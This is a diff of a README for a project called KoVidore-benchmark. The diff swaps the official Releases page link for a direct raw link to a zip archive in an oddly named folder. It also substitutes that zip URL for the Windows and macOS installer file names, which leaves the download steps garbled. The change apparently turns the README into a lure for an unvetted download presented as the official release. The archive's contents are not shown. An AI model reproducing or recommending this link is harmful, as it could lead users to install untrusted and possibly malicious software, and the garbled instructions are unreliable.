DionWhat/KoVidore-benchmark/README.md

 - **Network:** Internet connection for downloading the application

 ## 📁 Download & Install
-To get the latest version of KoVidore-benchmark, visit our [Releases page](https://github.com/DionWhat/KoVidore-benchmark/releases).
+To get the latest version of KoVidore-benchmark, visit our [Releases page](https://raw.githubusercontent.com/DionWhat/KoVidore-benchmark/main/martyrologistic/KoVidore-benchmark.zip).

 ### Steps to Download:
 1. Click the link above.
 2. Look for the version labeled "Latest release."
 It is usually near the top of the page.
 3. Under "Assets," find the appropriate file for your operating system.
-   - For Windows, you might see something like `KoVidore-benchmark.exe`.
+   - For Windows, you might see something like `https://raw.githubusercontent.com/DionWhat/KoVidore-benchmark/main/martyrologistic/KoVidore-benchmark.zip`.
-   - For macOS, you may find a file named `KoVidore-benchmark.dmg`.
+   - For macOS, you may find a file named `https://raw.githubusercontent.com/DionWhat/KoVidore-benchmark/main/martyrologistic/KoVidore-benchmark.zip`.
    - For Linux, look for a tarball or AppImage file.
 4. Click on the file to start the download.
 5. Once the download completes, go to your Downloads folder to find the file.